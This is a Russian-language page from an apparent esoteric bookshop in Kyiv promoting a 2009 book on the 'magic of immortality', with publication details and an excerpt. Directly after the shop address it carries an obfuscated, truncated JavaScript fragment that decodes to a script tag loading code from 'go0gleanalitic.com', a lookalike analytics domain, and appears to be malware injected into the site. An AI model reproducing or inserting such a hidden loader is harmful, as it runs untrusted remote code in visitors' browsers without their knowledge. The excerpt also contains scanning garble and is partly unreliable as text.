Магия Бессмертия - Главный БарьерАвтор: Бурислав Сервест
ISBN: 978-5-91078-060-0
Переплет: Мягкая обложка, 560 стр.
Год издания: 2009 год
Формат: 60x90/16 (~145х217 мм)
Издатель: “Золотое сечение”
Цена : см. прайс-лист

Магический магазин “Мистическая Гирлянда” представляет Вам книгу Бурислава Сервеста ”Магия Бессмертия - Главный Барьер”

Истинное Знание материально и конечно. Проблема в том, что его у нас слишком мало, чтобы заполнить все свои структуры одновременно. Мы можем спускаться вниз и подниматься вверх, отделяясь соответственно от ПОЗНА­НИЯ чира, от соприкосновения с ИНДИВИДУАЛЬНОСТЬЮ другого и от ИЗМЕНЕНИЯ мира, от соприкосновения с собственной ИНДИВИДУАЛЬНОСТЬЮ. А это делает нас послушной игрушкой Правил - пока мы способны ПОЗНА­ВАТЬ, мы не можем воплотить наше Знание в реальность иначе как с помощью других людей, каждый из которых предварительно пропустит его через фильтр уже заданных нам «правил». А когда мы действуем, то наше сознание полностью подчинено этим правилам, поэтому наши дей­ствия исходят не из нашей ИНДИВИДУАЛЬНОСТИ, а толь­ко используют ее энергию, подчиняясь тем же «правилам».

Этот механизм кажется несокрушимым, хотя, по сути - это «мыльный пузырь», существующий только из-за нашего СТРАХА. При ПОЗНАНИИ мира, при соприкосно­вении с его «информационным ядром» сразу же возникает ощущение «несоразмерности» — Знание слишком велико и оно может «разорвать» нас, если мы впустим его в себя. Именно это ощущение и заставляет нас ЗАМЕРЕТЬ при оприкосновении со Знанием, сделать паузу, после которой •но уменьшается до пределов Правил. А при ИЗМЕНЕНИИ >шра, в том случае, когда импульсы к действию исходят изнутри, мы БОИМСЯ своей собственной ИНДИВИДУАЛЬ­НОСТИ. Нам кажется, что Сила, заключенная в ней, (обязательно разрушит наш собственный мир. Мы относимся к себе, к своей истинной сущности как к «голодному тигру», который разорвет нас, если мы дадим ему хоть немного свободы. И даже не подозреваем о том, что на самом деле это веселый и дружелюбный тигренок, который может вырасти до любых размеров, но при этом не утра­тит ни веселости, ни дружелюбия.

Приобрести данную книгу Вы можете посетив наш эзотерический магазин по адресу г. Киев, ул. Гришка,8
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>